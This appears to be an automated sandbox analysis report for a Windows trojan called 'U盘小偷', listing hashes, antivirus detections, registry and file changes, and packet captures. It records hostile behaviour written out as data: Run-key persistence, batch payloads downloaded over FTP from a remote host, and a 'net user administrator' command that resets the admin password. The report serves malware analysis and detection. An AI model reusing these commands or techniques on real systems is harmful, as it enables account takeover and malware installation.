Analysis Date2015-10-19 14:03:40
MD513debfac08b82de13a04e74ed21665e2
SHA197e1b9039278ffbd4d2ec1cc9590837b2f8d01a7

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 5a8fabd47a118a20b9682e471ec4c399 sha1: 8a7133eca02e2bc08ac7ab4fd66d5f1118e6aba0 size: 561152
Section.rdata md5: 8b205a1ad972f598fed1bc4b791c1b26 sha1: c96d5a5d09a37fe4b49a5c89aa51d0da439b2c36 size: 159744
Section.data md5: db28e1c54795441bed5af9d98d59f0f5 sha1: 0076f0afa59620e01fecd90c8cfe50b06d0d1b5b size: 90112
Section.rsrc md5: f104b51d49c68a24f0ece28499a6dc5b sha1: 3575eab0aa9241c055992057844e4f29e8dec574 size: 45056
Timestamp2010-10-20 12:10:01
VersionLegalCopyright: 作者:小刀 版权所有
FileVersion: 1.0.0.0
CompanyName: 作者:小刀
Comments: 本程序使用易语言编写(http://www.eyuyan.com)
ProductName: U盘小偷
ProductVersion: 1.0.0.0
FileDescription: 江中小刀工作室
PackerMicrosoft Visual C++ v6.0
PEhash37b87824512fb711c685d58dae8cf8a9b109011a
IMPhashf0589be27c78bbc889e6c4a614203768
AVCA (E-Trust Ino)no_virus
AVF-SecureTrojan:W32/DelfInject.R
AVDr. WebTrojan.DownLoader5.26440
AVClamAVno_virus
AVArcabit (arcavir)no_virus
AVBullGuardno_virus
AVPadvishno_virus
AVVirusBlokAda (vba32)TrojanPSW.Bjlog
AVCAT (quickheal)TrojanPSW.Bjlog.r4
AVTrend Microno_virus
AVKasperskyno_virus
AVZillya!Trojan.Bjlog.Win32.9157
AVEmsisoftno_virus
AVIkarusTrojan.Offend
AVFrisk (f-prot)W32/Agent.EW.gen!Eldorado
AVAuthentiumW32/Agent.EW.gen!Eldorado
AVMalwareBytesno_virus
AVMicroWorld (escan)no_virus
AVMicrosoft Security Essentialsno_virus
AVK7Backdoor ( 04c511bf1 )
AVBitDefenderno_virus
AVFortinetW32/Bjlog.BJBO!tr.pws
AVSymantecno_virus
AVGrisoft (avg)PSW.OnlineGames3.CGIN
AVEset (nod32)no_virus
AVAlwil (avast)Malware-gen:Win32:Malware-gen
AVAd-Awareno_virus
AVTwisterTrojan.D3DB75A7CA69EC0D
AVAvira (antivir)TR/Offend.kdv.397313
AVMcafeeno_virus
AVRisingTrojan.Win32.Generic.12A0A678

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\software\microsoft\windows\CurrentVersion\Run\\\xce\\xd2\\xb5\\xc4\\xc6\\xf4\\xb6\\xaf\\xcf\\xee ➝
c:\windows\system\2.bat\\x00
RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\BSDHA97U\logo[1].gif
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\2345[1].htm
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012015101920151020\index.dat
Creates File\Device\Afd\AsyncConnectHlp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Filec:\windows\system\fff.bat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates Filec:\windows\system\2.bat
Creates File\Device\Afd\Endpoint
Creates Filec:\autoexec.BAT
Deletes Filec:\windows\system\fff.bat
Deletes Filec:\windows\system\2.bat
Deletes FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013061320130614\index.dat
Deletes FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\MSHist012013052720130603\index.dat
Creates Processc:\autoexec.BAT
Creates Mutex_!SHMSFTHISTORY!_
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!mshist012015101920151020!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSwww.2345.com

Process
↳ c:\autoexec.BAT

Creates Processnet user administrator qcwewe

Process
↳ net user administrator qcwewe

Creates Processnet1 user administrator qcwewe

Process
↳ net1 user administrator qcwewe

Creates FilePIPE\samr
Creates FilePIPE\lsarpc

Network Details:

DNSwww.2345.com
Type: A
42.62.30.180
HTTP GEThttp://www.2345.com/?6225
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://www.2345.com/logo.gif
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1034 ➝ 204.45.67.3:21
Flows TCP192.168.1.1:1034 ➝ 204.45.67.3:21
Flows TCP192.168.1.1:1040 ➝ 42.62.30.180:80
Flows TCP192.168.1.1:1041 ➝ 42.62.30.180:80

Raw Pcap
0x00000000 (00000)   47455420 2f3f3632 32352048 5454502f   GET /?6225 HTTP/
0x00000010 (00016)   312e310d 0a416363 6570743a 202a2f2a   1.1..Accept: */*
0x00000020 (00032)   0d0a4163 63657074 2d4c616e 67756167   ..Accept-Languag
0x00000030 (00048)   653a2065 6e2d7573 0d0a4163 63657074   e: en-us..Accept
0x00000040 (00064)   2d456e63 6f64696e 673a2067 7a69702c   -Encoding: gzip,
0x00000050 (00080)   20646566 6c617465 0d0a5573 65722d41    deflate..User-A
0x00000060 (00096)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000070 (00112)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000080 (00128)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000090 (00144)   204e5420 352e313b 20535631 3b202e4e    NT 5.1; SV1; .N
0x000000a0 (00160)   45542043 4c522032 2e302e35 30373237   ET CLR 2.0.50727
0x000000b0 (00176)   290d0a48 6f73743a 20777777 2e323334   )..Host: www.234
0x000000c0 (00192)   352e636f 6d0d0a43 6f6e6e65 6374696f   5.com..Connectio
0x000000d0 (00208)   6e3a204b 6565702d 416c6976 650d0a0d   n: Keep-Alive...
0x000000e0 (00224)   0a                                    .

0x00000000 (00000)   55534552 20393537 360d0a50 41535320   USER 9576..PASS 
0x00000010 (00016)   31323334 35360d0a 54595045 20490d0a   123456..TYPE I..
0x00000020 (00032)   504f5254 20313932 2c313638 2c34322c   PORT 192,168,42,
0x00000030 (00048)   312c3139 2c313337 0d0a5349 5a452032   1,19,137..SIZE 2
0x00000040 (00064)   2e626174 0d0a5245 54522032 2e626174   .bat..RETR 2.bat
0x00000050 (00080)   0d0a5459 50452049 0d0a504f 52542031   ..TYPE I..PORT 1
0x00000060 (00096)   39322c31 36382c34 322c312c 342c3134   92,168,42,1,4,14
0x00000070 (00112)   0d0a5349 5a452066 66662e62 61740d0a   ..SIZE fff.bat..
0x00000080 (00128)   52455452 20666666 2e626174 0d0a       RETR fff.bat..

0x00000000 (00000)   47455420 2f6c6f67 6f2e6769 66204854   GET /logo.gif HT
0x00000010 (00016)   54502f31 2e310d0a 41636365 70743a20   TP/1.1..Accept: 
0x00000020 (00032)   2a2f2a0d 0a526566 65726572 3a206874   */*..Referer: ht
0x00000030 (00048)   74703a2f 2f777777 2e323334 352e636f   tp://www.2345.co
0x00000040 (00064)   6d2f3f36 3232350d 0a416363 6570742d   m/?6225..Accept-
0x00000050 (00080)   4c616e67 75616765 3a20656e 2d75730d   Language: en-us.
0x00000060 (00096)   0a416363 6570742d 456e636f 64696e67   .Accept-Encoding
0x00000070 (00112)   3a20677a 69702c20 6465666c 6174650d   : gzip, deflate.
0x00000080 (00128)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000090 (00144)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x000000a0 (00160)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x000000b0 (00176)   57696e64 6f777320 4e542035 2e313b20   Windows NT 5.1; 
0x000000c0 (00192)   5356313b 202e4e45 5420434c 5220322e   SV1; .NET CLR 2.
0x000000d0 (00208)   302e3530 37323729 0d0a486f 73743a20   0.50727)..Host: 
0x000000e0 (00224)   7777772e 32333435 2e636f6d 0d0a436f   www.2345.com..Co
0x000000f0 (00240)   6e6e6563 74696f6e 3a204b65 65702d41   nnection: Keep-A
0x00000100 (00256)   6c697665 0d0a0d0a                     live....


Strings